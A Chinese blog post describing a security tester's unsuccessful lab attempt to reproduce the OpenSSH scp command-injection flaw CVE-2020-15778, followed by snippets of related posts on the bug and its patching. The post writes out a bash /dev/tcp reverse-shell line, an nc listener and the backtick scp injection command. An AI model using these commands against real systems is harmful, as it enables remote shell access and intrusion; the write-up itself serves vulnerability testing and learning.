CVE-2020-15778 漏洞复现避坑指南

已于 2022-07-20 10:29:16 修改
阅读量2.5k 收藏 2
点赞数
文章标签: 安全
于 2022-07-20 10:26:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45836195/article/details/125883140
版权

今天给公司电脑漏扫的时候发现了CVE-2020-15778漏洞,于是就想按网上的操作说明漏洞复现一下试试,结果无论如何怎么尝试都失败。主要过程如下:

一、失败过程

渗透:kali 2020.3    :192.168.155.168

           kali2022.2.    :  192.168.155.165

靶机:centOS7        :192.168.155.167

          ubuntu20.04   :192.168.155.166

刚开始测试时参考连接:

CVE-2020-15778 Openssh-SCP 命令注入漏洞复现报告 - 腾讯云开发者社区-腾讯云

CVE-2020-15778漏洞复现 - ch4nge - 博客园

按照上面的说明

先在靶机上安装iptables,然后openssh(CentOS自带、ubuntu需要下载安装),完成后按照步骤开始测试。

1.首先ssh看下,正常。

2.按照教程所说,在靶机上先iptables -F清除所有策略,再执行 iptables -t filter -A INPUT -p tcp --dport 22 -m tos --tos 0x10 -j DROP增加ssh端口禁用策略,最后iptables -L -n --line-number查看策略是否生效。

3.按教程先新建一个内容为bash -i >& /dev/tcp/192.168.200.168/6666 0>&1的脚本,测试用scp将脚本复制到靶机/tmp目录,成功。

 再用ssh测试一下靶机

输入密码后就无回显了 

4.开始命令注入,现在kali上输入nc -lvp 6666监听刚才脚本里写的反弹端口。然后用scp命令构造命令注入语句,这里写法比较多,总的意思反正就是让终端去执行``里的内容。这里我用(我在hosts里添加了主机名,把主机名替换成IP即可):

scp 123.sh root@centos7:/'sh `/tmp/123.sh`'

可以看到靶机毫不犹豫的拒绝了我的连接。。。。 

 5.问题分析

看这个回显觉得应该是iptables在起作用了,这里有命令注入的连接的时候直接拒绝了,把iptables策略清除再试一下。

输入密码后,成功

由于靶机是不自带iptables的,这里的iptables是我临时用yum下载安装的,但是可能版本已经更新,对命令注入的这方面已经进行了优化。

6.再使用kali2022.02的靶机(192.168.155.165)进行测试 。

直接提示没有此目录,失败。

7.问题分析 

 靶机的iptables已清除所有策略,但查看kali2022的ssh版本如下:

CVE-2020-15778的漏洞影响范围是8.3p1以下所有版本。看来他们在新版本中对发起端也进行了命令校验。所以渗透机如果使用8.3p1以上版本的ssh做测试也是不行的。。。。

8.吐槽

这个漏洞折腾了我两天时间,漏洞利用的门槛较高,需要知道靶机的用户名和密码,而且在新版本的这些ssh、iptable中均对该漏洞进行了修复,利用难度增加。总结下来我真实觉得这个屁漏洞没什么蛋用。

weixin_45836195
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
网络攻防之CVE-2020-15778漏洞及修详细过程
m0_62574258的博客
02-29 1601
OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。(10)可以看到在监听窗口反弹出靶机的shell(root@localhost),攻击成功,即使靶机通过防火墙禁止了ssh远程登录能通过此漏洞远程控制靶机,在shell中输入ls命令查看靶机的根目录文件。漏洞危害:该漏洞危害性很高, 因为一旦入侵成功,攻击者可以尝试在目标系统上的shell上执行恶意代码,执行各种命令,获取系统信息,上传或下载文件,甚至完全控制目标系统。
CVE-2020-15778漏洞学习
Dasdwer的博客
04-11 1968
漏洞公开披露2020年7月18日,openssh 8.3p1的SCP命令存在命令注入漏洞,攻击者可以利用此漏洞执行任意命令。
CVE-2020-15778漏洞-——快速升级——openssh8.6.p1.tar.gz
06-21
OpenSSH 命令注入漏洞(CVE-2020-15778),文件包含installs.sh、openssh-8.6p1.tar.gz、openssl-1.1.1k.tar.gz、zlib-1.2.11.tar.gz。升级时候将openssh.tar.gz放至/home下解压,进入openssh目录,执行chmod +x install.sh 命令,然后执行./install.sh即可 如果遇到该问题openssh Your OpenSSL headers do not match your library. vi /etc/ld.so.conf 注释该行 #/usr/local/ssl/lib
[ 漏洞篇 ] OpenSSH 命令注入漏洞 (CVE-2020-15778)
qq_51577576的博客
08-05 1116
Linux scp 命令用于 Linux 之间制文件和目录。scp 是 secure copy 的缩写, scp 是 linux 系统下基于 ssh 登陆进行安全的远程文件拷贝命令。scp 是加密的,rcp 是不加密的,scp 是 rcp 的加强版。该漏洞虽然利用很简单,但漏洞危害很大,漏洞等级也属于严重。利用需要知道ssh密码,在测试过程中通常可以配合ssh弱口令一起使用,或者在得知ssh密码的情况下进行使用,这样就可进行反弹shell获取权限了。...
OpenSSH 命令注入漏洞(CVE-2020-15778)
weixin_47531489的博客
07-20 1万+
1 简介 OpenSSH是SSH(SecureSHell)协议的免费开源实。OpenSSH是个SSH的软件,linux/unix都用openssh软件提供SSH服务。scp 是 secure copy 的缩写, scp 是 linux 系统下基于 ssh 登陆进行安全的远程文件拷贝命令。 2 漏洞概述 该漏洞编号CVE-2020-15778。OpenSSH的8.3p1及之前版本中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。 漏洞等.
OpenSSH 命令注入漏洞(CVE-2020-15778)修
热门推荐
学渣程序员的博客
06-04 2万+
OpenSSH 命令注入漏洞(CVE-2020-15778)修 最近安全部门丢了一堆服务器漏洞扫描结果过来,开发运维都得干的我火急火燎又开始去修补漏洞去了。 1. 漏洞介绍 ​ OpenSSH(OpenBSD Secure Shell)是OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 8.6p1及之前版本中的scp的scp.c文件存在命令注入漏洞。该漏洞源于外部输入数据构造
CVE-2020-15778 openssh漏洞
N07ME的博客
12-11 6732
漏洞描述 https://access.redhat.com/security/cve/cve-2020-15778 简单来说,就是scp命令是可以注入特殊字段,在目标主机上执行指令的。 原理是因为scp是通过ssh实的,一样的需要用户名和密码才能登陆。也就是说,这个漏洞其实针对的是那些禁用了ssh但是没禁用scp的主机,针对这些主机,可以从外部通过scp实和ssh一样的功能。 漏洞方案 1.升级到openssh-8.4以上的版本 (要求操作系统版本在centos 8及以上) 2.禁用scp命令 m
OpenSSH命令注入漏洞(CVE-2020-15778)
qq_42947816的博客
02-09 1万+
一般在特定环境下利用,比如在知道SSH账户密码后,但禁用SSH登陆或SSH连接被阻止,服务器允许使用scp传文件的情况下,可对其进行命令注入,所以如果攻击者不知道ssh账密,此漏洞无法利用。
CVE-2020-15778:OpenSSH命令注入漏洞
m0_48520508的博客
12-08 2240
0x01 简介 OpenSSH是SSH(Secure SHell)协议的免费开源实。OpenSSH是个SSH的软件,linux/unix都用openssh软件提供SSH服务。scp 是 secure copy 的缩写, scp 是 linux 系统下基于 ssh 登陆进行安全的远程文件拷贝命令。 0x02 漏洞概述 该漏洞编号CVE-2020-15778。OpenSSH的8.3p1及之前版本中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。 0
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
通过升级openssh到OpenSSH8.4 修openssh低版本的漏洞 openssh8.4需要的 openssl-1.1.1g, openssh-8.4p1,zlib-1.2.11
CVE-2020-15778漏洞
m0_58606546的博客
11-30 2392
1.漏洞描述 (1)简介:2020年6月9日,研究人员Chinmay Pandya在Openssh中发了一个漏洞,于7月18日公开。OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。该漏洞属于命令执行漏洞,目前绝大多数linux系统受影响。 (2)scp介绍:scp是Linux下基于 ssh 登陆进行安全的远程文件拷贝命,用于不同Linux系统之间制文件和目录。该命令由openssh的scp.c及其他相关代码实。在本次漏洞中就是利用scp命
反弹shell失败的几种原因
谢公子的博客
05-03 1万+
在实战中,我们经常会遇到各种各样奇怪的环境。 反弹shell失败的原因有很多: 反弹的命令不存在或当前用户无权限调用bash 禁止出站IP 禁止出站端口 禁止出站协议 反弹的命令不存在或当前用户无权限调用bash 由于这种情况下只局限于Linux,所以不考虑Windows 反弹shell的命令,尽管这么多命令可以反弹shell,但是最终都还是调用bash来反弹,所以 #bas...
别再头疼反弹Shell失败了,这篇文章带你找到问题根源
最新发布
vivlol918的博客
09-01 1000
例如,如果目标系统的防火墙只允许80端口(HTTP)和443端口(HTTPS)的流量通过,而你尝试使用其他端口进行反弹shell,那么连接将被阻止,导致失败。
OpenSSH 命令注入漏洞CVE-2020-15778)
weixin_47230336的博客
09-14 583
OpenSSH 命令注入漏洞CVE-2020-15778) CVE编号: CVE-2020-15778 发布时间: 2020-07-24 危害等级: 高危 漏洞版本:<= openssh-8.3p1 漏洞描述: OpenSSH 8.3p1及之前版本中的scp的scp.c文件存在操作系统命令注入漏洞。该漏洞即使在禁用ssh登录的情况下,但是允许使用scp传文件,而且远程服务器允许使用反引号(`),可利用scp制文件到远程服务器时,执行带有payload的scp命令,从而在后续利用中getshell。
CVE-2020-15778 漏洞利用
09-01
很抱歉,但我无法提供关于CVE-2020-15778漏洞利用的引用内容。根据我所了解的,CVE-2020-15778是一个具有远程执行代码风险的漏洞,但我无法提供具体的漏洞利用信息。如果您对该漏洞有任何疑问,建议您查阅相关的安全公告和资料,以了解更多详细信息和相应的修方法。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [SAP_RECON:CVE-2020-6287,CVE-2020-6286的PoC(SAP RECON漏洞)](https://download.csdn.net/download/weixin_42099530/16285854)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CVE-2020-15778漏洞](https://blog.csdn.net/m0_58606546/article/details/121630058)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值